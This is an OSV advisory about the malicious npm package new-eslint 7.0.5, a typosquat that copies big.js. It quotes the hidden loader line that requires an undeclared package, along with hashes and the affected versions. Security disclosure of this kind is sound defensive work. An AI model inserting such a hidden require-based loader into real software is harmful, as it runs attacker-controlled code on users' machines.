MAL-2026-6224

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/new-eslint/MAL-2026-6224.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6224

Published

2026-06-19T14:23:59Z

Modified

2026-06-19T15:47:26.789307160Z

Summary

Malicious code in new-eslint (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (6f068a5c7ad1a53c60d794a3b4585418956c176c42b8d5d90855e2ac60962b25)

Package is published as 'new-eslint' but ships a verbatim copy of MikeMcl/big.js, with a hidden loader injected mid-file between P.minus and P.mod in both big.js:605 and big.mjs:605: const helper = require("ts-eslint-helper"); helper.from_str().then(e => e).catch(e => { });. This require fires whenever a consumer imports or requires the package and silently swallows all errors. The required package ts-eslint-helper is not declared in package.json — the manifest lists a different package, eslint-helper@4.0.1 — so the loaded code is undeclared and attacker-mutable. The README claims 'no dependencies' and describes big.js, while the package name impersonates eslint tooling: classic typosquat lure plus hidden remote-controlled loader. Whatever ts-eslint-helper.from_str() does runs in the installer's process on import with no advertised functionality justifying it.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "6f068a5c7ad1a53c60d794a3b4585418956c176c42b8d5d90855e2ac60962b25",
            "source": "amazon-inspector",
            "modified_time": "2026-06-19T14:23:59Z",
            "versions": [
                "7.0.5"
            ],
            "id": "IN-MAL-2026-007067",
            "import_time": "2026-06-19T15:41:55.008216882Z"
        }
    ]
}

References

https://www.npmjs.com/package/new-eslint/v/7.0.5

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / new-eslint

Package

Name: new-eslint; View open source insights on deps.dev
Purl: pkg:npm/new-eslint

Affected ranges

Affected versions

7.*

7.0.5

Database specific

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/new-eslint/MAL-2026-6224.json"

indicators

{
    "evidence_files": [
        {
            "sha256": "a561aa99a23974fceafd4b2bc8eb050fe3159a0328fd73ea8e3e1bc599e288cb",
            "tlsh": "0921f267c9a19db70af85b98b8ac43aaf1151b1f01a14c5bb07b131c4b3345b2096bbd",
            "path": "package.json"
        },
        {
            "sha256": "d1f1baf7ef7571122bd26e3676d6f2dcf7cc7fd7dc9cdec4c3b75535ad0e3bbf",
            "tlsh": "9cc2658c3ac67579593363788f465088eb38525712c8b286b4ae62b46f78cb107b4fdc",
            "path": "big.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-IihA49/Cnl7beKKA/JFi/8TjMLCEtL4GjE2qZ31odOxQPNV5KxZA/8n9xfjIc3ZzYlFjVXS73unbfEtRGuCShQ==",
                "sha1": "5caff974ef503bc10fb120958e1b78330bae7c02"
            },
            "filename": "new-eslint-7.0.5.tgz"
        }
    ]
}